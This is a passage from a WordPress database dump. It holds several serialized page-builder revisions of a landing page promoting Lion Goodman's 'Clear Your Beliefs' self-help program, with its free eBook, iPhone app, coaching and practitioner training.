Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1123, 1608, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:691:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:608:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1124, 1609, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:758:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p>iClearIt is not yet available for Android or other platforms.</p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:608:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1125, 1610, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:608:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button 